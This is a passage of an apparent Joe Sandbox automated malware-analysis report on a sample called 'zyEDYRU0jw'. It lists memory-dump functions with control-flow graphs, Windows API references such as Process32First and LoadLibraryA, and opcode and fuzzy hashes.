                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b162d8b368e78357d99dce9fd276770b35c92b749c53c0ff69bafaf1edd522cb
                                                                                                • Instruction ID: 28c484ff5a11e32503e7a06935db42bbbe8eb5b8a8436746b790c1898c8c3e5e
                                                                                                • Opcode Fuzzy Hash: b162d8b368e78357d99dce9fd276770b35c92b749c53c0ff69bafaf1edd522cb
                                                                                                • Instruction Fuzzy Hash: 2FB14D70E002098FDF20CFADD88579DBBF2BF88315F148529E415A7798EB789846CB91
                                                                                                Function 0183E988 Relevance: .2, Instructions: 221COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89e4db9ec3d32032db0d9cee3bc27d70ddb91ac5f8c0d68272def88b06200016
                                                                                                • Instruction ID: 77e0aed18ff7e6ef492579518d89aeb69e685bc4d291b2534b639a0bd6e73ecc
                                                                                                • Opcode Fuzzy Hash: 89e4db9ec3d32032db0d9cee3bc27d70ddb91ac5f8c0d68272def88b06200016
                                                                                                • Instruction Fuzzy Hash: 53C126B2901745DBE710CF29EA4A2893BB1BB85324F944769D2612B2E0D7BD11CFCF85
                                                                                                Function 01837D70 Relevance: .2, Instructions: 163COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8195ebac70612facd734e8dc039ffb1f079ff94102f0d913787e7e5f4e8f727f
                                                                                                • Instruction ID: 6cb593f4176ec6128674ae3a0e71d8beeca2158d21ecc2a817b8fdd09eaca46a
                                                                                                • Opcode Fuzzy Hash: 8195ebac70612facd734e8dc039ffb1f079ff94102f0d913787e7e5f4e8f727f
                                                                                                • Instruction Fuzzy Hash: E8513E71600B01CFD735DF29C88465AB7F2BFC8710B288A2DD45AC76A5DB70EA46CB91
                                                                                                Function 0183E0BF Relevance: 6.1, APIs: 4, Instructions: 140threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 118 183e0bf-183e16f GetCurrentProcess 123 183e171-183e177 118->123 124 183e178-183e1ac GetCurrentThread 118->124 123->124 125 183e1b5-183e1e9 GetCurrentProcess 124->125 126 183e1ae-183e1b4 124->126 127 183e1f2-183e20d call 183e2b0 125->127 128 183e1eb-183e1f1 125->128 126->125 132 183e213-183e242 GetCurrentThreadId 127->132 128->127 133 183e244-183e24a 132->133 134 183e24b-183e2ad 132->134 133->134
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0183E15E
                                                                                                • GetCurrentThread.KERNEL32 ref: 0183E19B
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0183E1D8
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0183E231
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: d0062c253b8f7aaf82e6a83153c367087f6e5530dfb1e34752f01029e63ecbb5
                                                                                                • Instruction ID: 83278aa5a3e550a9cf84b2097ee9c7f5e277b0e13f9a24ccc5128617913996b6
                                                                                                • Opcode Fuzzy Hash: d0062c253b8f7aaf82e6a83153c367087f6e5530dfb1e34752f01029e63ecbb5
                                                                                                • Instruction Fuzzy Hash: 805178B19013498FDB14CFA9D888BDEBBF1EF88304F248459E408B7291DB746985CFA1
                                                                                                Function 0183E0E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 141 183e0e0-183e16f GetCurrentProcess 145 183e171-183e177 141->145 146 183e178-183e1ac GetCurrentThread 141->146 145->146 147 183e1b5-183e1e9 GetCurrentProcess 146->147 148 183e1ae-183e1b4 146->148 149 183e1f2-183e20d call 183e2b0 147->149 150 183e1eb-183e1f1 147->150 148->147 154 183e213-183e242 GetCurrentThreadId 149->154 150->149 155 183e244-183e24a 154->155 156 183e24b-183e2ad 154->156 155->156
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0183E15E
                                                                                                • GetCurrentThread.KERNEL32 ref: 0183E19B
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0183E1D8
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0183E231
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 5e557c4ce63e7986d4ee3fd429c9636535cabc335e897e9cf85f847d8c295a64
                                                                                                • Instruction ID: c6cdaf7ffe4f59bb8a639c2fe27cc2a89e2d6097253509f72bc8521f409b0955
                                                                                                • Opcode Fuzzy Hash: 5e557c4ce63e7986d4ee3fd429c9636535cabc335e897e9cf85f847d8c295a64
                                                                                                • Instruction Fuzzy Hash: 925169B09006499FDB14CFA9D588BDEBBF1EF88304F248459E408B7290DB74A985CFA1
                                                                                                Function 08891E80 Relevance: 5.2, Strings: 4, Instructions: 200COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 163 8891e80-8891eae 165 8891eba-8891edb 163->165 166 8891eb0 163->166 170 88920ca-88920ef 165->170 171 8891ee1-8891ee5 165->171 166->165 174 88920f6-889212a 170->174 172 8891ef1-8891f37 171->172 173 8891ee7-8891eeb 171->173 191 8891f39-8891f71 172->191 192 8891f78-8891f8e 172->192 173->172 173->174 186 889212d-8892132 174->186 187 889212c 174->187 189 8892135-889214b 186->189 190 8892134 186->190 187->186 196 889214d-8892158 189->196 197 889215f-8892162 189->197 190->189 191->192 198 8891f98-8891fb1 192->198 199 8891f90 192->199 196->197 203 889200f-8892042 198->203 204 8891fb3-8891fe1 198->204 199->198 212 88920bd-88920c7 203->212 211 8891fe6-8891ff2 204->211 211->212 214 8891ff8-889200a 211->214 214->212
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457353667.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8890000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (q$(q$xq$xq
                                                                                                • API String ID: 0-4001314665
                                                                                                • Opcode ID: 78c7254207cea8a1b771a13b1e7bfa4c02a1f3f1bd477b4d25b043533ae68425
                                                                                                • Instruction ID: 8e9547f79f5e8942b8e5fbf9f86b709ada89dd0905f0f4c022c014362530d462
                                                                                                • Opcode Fuzzy Hash: 78c7254207cea8a1b771a13b1e7bfa4c02a1f3f1bd477b4d25b043533ae68425
                                                                                                • Instruction Fuzzy Hash: 1D71D3313002059FDB159F28D854BAE7BA2EFC4311F18856DE95A9B395CB36EC46CB90
                                                                                                Function 087175F0 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 591 87175f0-8717608 call 8715d74 594 8717658-87176f7 591->594 595 871760a-8717618 591->595 613 8717730-871777c LoadLibraryA 594->613 614 87176f9-8717703 594->614 596 871761a-871761d 595->596 597 871761f 595->597 599 8717621-8717623 call 8715d80 596->599 597->599 602 8717628-8717630 599->602 603 8717632-8717635 602->603 604 8717637 602->604 606 8717639-8717655 603->606 604->606 619 8717785-87177bd 613->619 620 871777e-8717784 613->620 614->613 615 8717705-8717707 614->615 617 8717709-8717713 615->617 618 871772a-871772d 615->618 621 8717715 617->621 622 8717717-8717726 617->622 618->613 627 87177cd 619->627 628 87177bf-87177c3 619->628 620->619 621->622 622->622 623 8717728 622->623 623->618 630 87177ce 627->630 628->627 629 87177c5 628->629 629->627 630->630
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: b90775041696621291b46287906def9cf5f8021fbf3d97fd3c35b7a079f188c1
                                                                                                • Instruction ID: a1937370b2642cef152a519e9045a98f99070daeae081f08da916e6a30639a3c
                                                                                                • Opcode Fuzzy Hash: b90775041696621291b46287906def9cf5f8021fbf3d97fd3c35b7a079f188c1
                                                                                                • Instruction Fuzzy Hash: 3651BE71E013598FDF18DFADC45479EBBF6AF88350F18852AD804ABB48DB749841CBA1
                                                                                                Function 08714BE4 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 631 8714be4-8714c90 633 8714c98-8714ce9 Process32First 631->633 634 8714cf2-8714d5e 633->634 635 8714ceb-8714cf1 633->635 640 8714d70-8714d77 634->640 641 8714d60-8714d66 634->641 635->634 642 8714d79-8714d88 640->642 643 8714d8e 640->643 641->640 642->643 645 8714d8f 643->645 645->645
                                                                                                APIs
                                                                                                • Process32First.KERNEL32(?,?), ref: 08714CD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: FirstProcess32
                                                                                                • String ID:
                                                                                                • API String ID: 2623510744-0
                                                                                                • Opcode ID: 7b4cbdce7e65371b95686cec1384c1ee0d6ad108452f2bdb48fbb0cd2a2182c8
                                                                                                • Instruction ID: e8d5694ed87db582dfe09ef3366db618d83ba01aae2f5806b90381b423ae02f3
                                                                                                • Opcode Fuzzy Hash: 7b4cbdce7e65371b95686cec1384c1ee0d6ad108452f2bdb48fbb0cd2a2182c8
                                                                                                • Instruction Fuzzy Hash: F54122B0D042289FEF21CF29C884BDDBBB5AF09304F9080DAD40CA7650DB746A89CF60
                                                                                                Function 08713ED8 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 662 8713ed8-8714ce9 Process32First 666 8714cf2-8714d5e 662->666 667 8714ceb-8714cf1 662->667 672 8714d70-8714d77 666->672 673 8714d60-8714d66 666->673 667->666 674 8714d79-8714d88 672->674 675 8714d8e 672->675 673->672 674->675 677 8714d8f 675->677 677->677
                                                                                                APIs
                                                                                                • Process32First.KERNEL32(?,?), ref: 08714CD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: FirstProcess32
                                                                                                • String ID:
                                                                                                • API String ID: 2623510744-0
                                                                                                • Opcode ID: b037dd1eb0fcb1f6e61d1710c1a0e6ad3b4b5960eecd165e0f34e4fe3aa3098b
                                                                                                • Instruction ID: 7888a8449470556f446c90b5b647d26afc78a9490129c434eafdc4963aece754
                                                                                                • Opcode Fuzzy Hash: b037dd1eb0fcb1f6e61d1710c1a0e6ad3b4b5960eecd165e0f34e4fe3aa3098b
                                                                                                • Instruction Fuzzy Hash: D54104B0D042289FEB60CF69C885BD9BBB5AF49304F5080E9D40CA7650DB746A89CF60
                                                                                                Function 08713ECC Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 646 8713ecc-8714ce9 Process32First 650 8714cf2-8714d5e 646->650 651 8714ceb-8714cf1 646->651 656 8714d70-8714d77 650->656 657 8714d60-8714d66 650->657 651->650 658 8714d79-8714d88 656->658 659 8714d8e 656->659 657->656 658->659 661 8714d8f 659->661 661->661
                                                                                                APIs
                                                                                                • Process32First.KERNEL32(?,?), ref: 08714CD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: FirstProcess32
                                                                                                • String ID:
                                                                                                • API String ID: 2623510744-0
                                                                                                • Opcode ID: 269c58e168d60ae221fd8995ab7da9a68c79926427ca58856428e10d3d867357
                                                                                                • Instruction ID: c3f187ddbca08499228c7a86f0719f878f768a9d16775fe526fda492a0e7fb06
                                                                                                • Opcode Fuzzy Hash: 269c58e168d60ae221fd8995ab7da9a68c79926427ca58856428e10d3d867357
                                                                                                • Instruction Fuzzy Hash: A14115B0D042289FEB64CF69C885BDDBBB5AF49304F9080E9D40CA7650DB746A89CF60
                                                                                                Function 08715D74 Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 678 8715d74-87176f7 681 8717730-871777c LoadLibraryA 678->681 682 87176f9-8717703 678->682 687 8717785-87177bd 681->687 688 871777e-8717784 681->688 682->681 683 8717705-8717707 682->683 685 8717709-8717713 683->685 686 871772a-871772d 683->686 689 8717715 685->689 690 8717717-8717726 685->690 686->681 695 87177cd 687->695 696 87177bf-87177c3 687->696 688->687 689->690 690->690 691 8717728 690->691 691->686 698 87177ce 695->698 696->695 697 87177c5 696->697 697->695 698->698
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: ea227ef531d99c42be1691849a5f715984d58eae30f84c1dbff282592eb389b8
                                                                                                • Instruction ID: 82c192496f3728a7a8f73efffbf2162d7260b13f01a91fa4de9b3dcc7ada84bf
                                                                                                • Opcode Fuzzy Hash: ea227ef531d99c42be1691849a5f715984d58eae30f84c1dbff282592eb389b8
                                                                                                • Instruction Fuzzy Hash: 584167B0D112498FDF14CFA9C88579EBBF1EB48340F188529E814A7A48D7749886CFA1
                                                                                                Function 0183E320 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0183E3AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: deca8478d3c355b3c18065606c04b7f4e3e661c271f09a3c6d07fea34065cbf9
                                                                                                • Instruction ID: 8fd9eb162261c33f43b97acab89dd356dcfae53869fdb1473e20e4ef460cf212
                                                                                                • Opcode Fuzzy Hash: deca8478d3c355b3c18065606c04b7f4e3e661c271f09a3c6d07fea34065cbf9
                                                                                                • Instruction Fuzzy Hash: ED21E6B5D012499FDB10CFAAD885ADEBFF8EB48310F14841AE914A3350D374A944CFA5
                                                                                                Function 0183E328 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0183E3AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 9622f665150b9ac20454de7465d0e289323b506d370c0a8808d9d5d3a2661a6d
                                                                                                • Instruction ID: 00cdd8df6ac081f4c81304b7075d0e6989519928a1ad4d5c2492430b890c8910
                                                                                                • Opcode Fuzzy Hash: 9622f665150b9ac20454de7465d0e289323b506d370c0a8808d9d5d3a2661a6d
                                                                                                • Instruction Fuzzy Hash: C121C2B5900249AFDB10CFAAD884ADEBBF8EB48310F14841AE918A3350D374A944CFA5
                                                                                                Function 0183CB50 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0183CBE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 54671f49e687ea89c57bd67f2141ee8ee074c479499cf506921995b2d2317893
                                                                                                • Instruction ID: 3fb658eb3254387b3703f8d37a3768401383252ce99e6e70088d66b0575fa923
                                                                                                • Opcode Fuzzy Hash: 54671f49e687ea89c57bd67f2141ee8ee074c479499cf506921995b2d2317893
                                                                                                • Instruction Fuzzy Hash: 1C2169B1D053498FCB10CFA9D945BEEBBB4FB08714F14845AD419B7281C3786A89CFA1
                                                                                                Function 0183CB60 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0183CBE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: f4d4b067e7a3861dea1191e8c7b72d22f2d30c59a3cfda58a1874d7454ef188b
                                                                                                • Instruction ID: 98984c6b8380a647f342f110b0bdfd7fc45a871a9c0ad2a90907ba4fc8c48b9c
                                                                                                • Opcode Fuzzy Hash: f4d4b067e7a3861dea1191e8c7b72d22f2d30c59a3cfda58a1874d7454ef188b
                                                                                                • Instruction Fuzzy Hash: 642138B1D003098FCB14CFA9D8457EEBBB4FB08724F14845AD429B7280C7746A89CFA1
                                                                                                Function 08714B48 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 08714BB2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3332741929-0
                                                                                                • Opcode ID: e87322396c3ffe04443513dd2fb386bd108faa2f28fc993aa30e96a745351832
                                                                                                • Instruction ID: bf08e9f0c2b699988198210d26b1ec4941552827edfc7ab73e61e5b49033d9d8
                                                                                                • Opcode Fuzzy Hash: e87322396c3ffe04443513dd2fb386bd108faa2f28fc993aa30e96a745351832
                                                                                                • Instruction Fuzzy Hash: 811106B59002498FCB20CF9AD484B9EFFF8FB48314F248459D558A7750C374A984CFA4
                                                                                                Function 0183E018 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0183F5BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: dcf8e713902027b04ec8b14d05c9efc3069859b0c583fec65799ed0298b66879
                                                                                                • Instruction ID: b095f3b31bb45cd24433611468484ba471a3873c7d7526d920131de76696c1f3
                                                                                                • Opcode Fuzzy Hash: dcf8e713902027b04ec8b14d05c9efc3069859b0c583fec65799ed0298b66879
                                                                                                • Instruction Fuzzy Hash: 0C1115B1D003488FDB20DF9AD485B9EBBF4EB48314F248459E519A7740D374AA84CFE5
                                                                                                Function 0183F560 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0183F5BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: e946abfff38b6f3b1ceb3c4e0273ee6a54be8776baddd921e96bf10f21eaf5db
                                                                                                • Instruction ID: 1514549f6a91ac214437a2f76beeafabd070c72e0c8f7a5521229f9bc81423e6
                                                                                                • Opcode Fuzzy Hash: e946abfff38b6f3b1ceb3c4e0273ee6a54be8776baddd921e96bf10f21eaf5db
                                                                                                • Instruction Fuzzy Hash: 0F1115B5D003488FDB20DF9AD885BDEBBF4EB48324F24845AE518A7740D774A584CFA5
                                                                                                Function 0183F5F9 Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0183F5BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 20b6c48eb562e3cc4691494afd5a0b277d6ee90440709925a4121bfbab382a46
                                                                                                • Instruction ID: 4473fb5abbf96e91d3c93bedebfaab0c0a9425fabd98791a630d1f0e3a784030
                                                                                                • Opcode Fuzzy Hash: 20b6c48eb562e3cc4691494afd5a0b277d6ee90440709925a4121bfbab382a46
                                                                                                • Instruction Fuzzy Hash: E9F0F673E052504FEB209B6DF4043AABFE1DFD5364F2A4077E548D7688C9788A8987E1
                                                                                                Function 08891E71 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457353667.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8890000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: xq
                                                                                                • API String ID: 0-3670251435
                                                                                                • Opcode ID: b4e0a01c578960084a43d5d8bf386eecacc0ad0279991f3f4ab622967c313c05
                                                                                                • Instruction ID: fc922e082dd8238f1ffbe6ad98e0193a1fba1849dc98629b574aedb372a6ccc6
                                                                                                • Opcode Fuzzy Hash: b4e0a01c578960084a43d5d8bf386eecacc0ad0279991f3f4ab622967c313c05
                                                                                                • Instruction Fuzzy Hash: 16519F343002059FEF15DF28D854BAEB7A2EF84311F18846DE8598B7A5CB76EC42CB80
                                                                                                Function 08890AA8 Relevance: .2, Instructions: 206COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457353667.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8890000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 34e6d93956acca894d5309f1bf9195dad144b2fc54ea221afa195eec3b5cfa2c
                                                                                                • Instruction ID: 0f8ff3dfa71b3433a65b3d4d6462386b0b0d3835b954d786c658463d8183e2ef
                                                                                                • Opcode Fuzzy Hash: 34e6d93956acca894d5309f1bf9195dad144b2fc54ea221afa195eec3b5cfa2c
                                                                                                • Instruction Fuzzy Hash: 73717835700B049FEB249B64C894B2BB7F3BB88711F14891CE68697B84CB74F846CB91
                                                                                                Function 088914F0 Relevance: .2, Instructions: 185COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457353667.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8890000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c7ba68d1e6bc73aec33c7bd0599df7298c2bb5d8427150a366f401548676dbb1
                                                                                                • Instruction ID: ee5e772de2eaf6f9d39d7cad537b50c63509b5e10c8022e736ff8fa6f0928d94
                                                                                                • Opcode Fuzzy Hash: c7ba68d1e6bc73aec33c7bd0599df7298c2bb5d8427150a366f401548676dbb1
                                                                                                • Instruction Fuzzy Hash: D0719C74A05216DFCF05CFA8D488A9DBBF2FF89311F194159E445AB3A4CB74AC42CB91
                                                                                                Function 08890ACD Relevance: .2, Instructions: 166COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457353667.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8890000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9d62231ab69bf5f407b99b1c0b534fd170f3126ac65f2d9fa0d2f403af420f84
                                                                                                • Instruction ID: a82a31b63e98043967c772e95fc3a58b44f7f29b3ab37d31e6f4ea2f1fefa65f
                                                                                                • Opcode Fuzzy Hash: 9d62231ab69bf5f407b99b1c0b534fd170f3126ac65f2d9fa0d2f403af420f84
                                                                                                • Instruction Fuzzy Hash: 5F614335600B049FEB24DB65C884B6BB7F3BB88711F14891CE69697B94CB74F846CB81
                                                                                                Function 08891925 Relevance: .1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
